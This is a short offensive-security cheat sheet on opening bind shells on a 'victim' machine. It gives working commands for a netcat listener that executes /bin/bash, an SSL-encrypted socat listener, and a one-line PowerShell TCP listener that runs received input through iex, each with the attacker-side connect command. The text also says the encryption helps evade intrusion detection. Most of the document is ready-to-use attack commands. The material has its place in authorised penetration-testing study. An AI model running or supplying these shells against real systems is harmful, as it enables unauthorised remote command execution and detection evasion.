# Bind Shell ## Netcat On the victim machine, run the following command: ```bash victim> $ nc -nlvp 4444 -e /bin/bash ``` On the attacker side, connect to the victim with this command : ```bash attacker> $ nc -nv 4444 ``` ## Socat To add encryption to a bind shell, rely on Secure Socket Layer certificates. This level of encryption will assist in evading intrusion detection systems (IDS) and will help hide the sensitive data transceived. First, create a self-signed certificate: ```bash openssl req -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -days 362 -out bind_shell.crt cat bind_shell.key bind_shell.crt > bind_shell.pem ``` Now that the key and certificate have been generated, convert them to a format socat will accept. To do so, combine both the **bind\_shell.key** and **bind\_shell.crt** files into a single **.pem** file before creating the encrypted socat listener. ```bash victim> $ cat bind_shell.key bind_shell.crt > bind_shell.pem victim> $ sudo socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash ``` Now, connect attacker's computer to the victim's bind shell. ```bash attacker> $ socat - OPENSSL:10.11.0.4:443,verify=0 ``` ## PowerShell On the victim command prompt, run the following command: {% code overflow="wrap" %} ```powershell powershell -c "$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',443);$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Stop()" ``` {% endcode %} Then, on the attacker machine, connect it using netcat: ```bash attacker> $ nc -nv 443 ```